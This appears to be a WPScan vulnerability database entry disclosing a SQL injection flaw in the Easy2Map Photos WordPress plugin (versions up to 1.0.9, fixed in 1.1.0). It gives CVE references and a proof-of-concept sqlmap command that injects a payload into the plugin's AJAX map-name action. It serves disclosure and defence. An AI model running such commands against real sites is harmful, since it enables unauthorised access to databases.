Easy2Map Photos <= 1.0.9 - SQL Injection



Description
The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input.
Proof of Concept
sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIEHERE --level=5 --risk=3

Affects Plugin

fixed in version 1.1.0

References

CVE 2015-4615
CVE 2015-4617
PACKETSTORM 132613
URL http://www.vapid.dhs.org/advisory.php?v=130

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Twitter _larry0
Views 555
Verified No
WPVDB ID 8078

Timeline

Publicly Published 2015-06-08 (over 3 years ago)
Added 2015-07-06 (over 3 years ago)
Last Updated 2015-07-12 (over 3 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.